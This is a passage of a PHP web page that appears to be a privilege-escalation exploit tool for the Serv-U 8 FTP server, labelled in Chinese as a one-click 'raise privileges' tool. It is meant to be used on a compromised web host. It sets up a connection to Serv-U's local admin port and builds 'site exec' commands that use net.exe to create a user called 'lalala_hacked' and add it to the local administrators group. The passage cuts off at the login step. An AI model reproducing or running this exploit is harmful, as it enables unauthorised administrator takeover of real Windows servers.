这个文件到处都是，人人都能拿到。  
*/  
  
?>   
<html>   
    <title>Serv-u 8 local exp ver 1.0</title>   
    <body>   
    <script>   
    function fun_showDiv(show)   
    {   
        document.getElementById(show).style.display="block";   
    }   
    </script>   
    <b>Serv-u 8 local exp ver 1.0</b>   
        <form id="form1" name="form1" method="post" action="?">   
                <p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a>   
                  <input type="text" name="admin_pwd" value="" />   
              </p>   
              <p>直接提权！   
                  <input type="submit" name="cmd" value="提权" />     
                <a href="#" onclick="fun_showDiv('QAdiv')">QA</a>   
              </p>   
              <pre>   
  
<?   
  
//Global var   
    $port=43958;   
    $host="127.0.0.1";   
    $sessionid="";   
    $getuserid="";   
    $ftpport=21;   
    $ftpuser="lalala_hacked";   
    $ftppwd=$_POST['admin_pwd'];   
    $exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";   
    $exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser."  /add";   
  
if($_POST['cmd']) {   
  
//login-----------------------------------------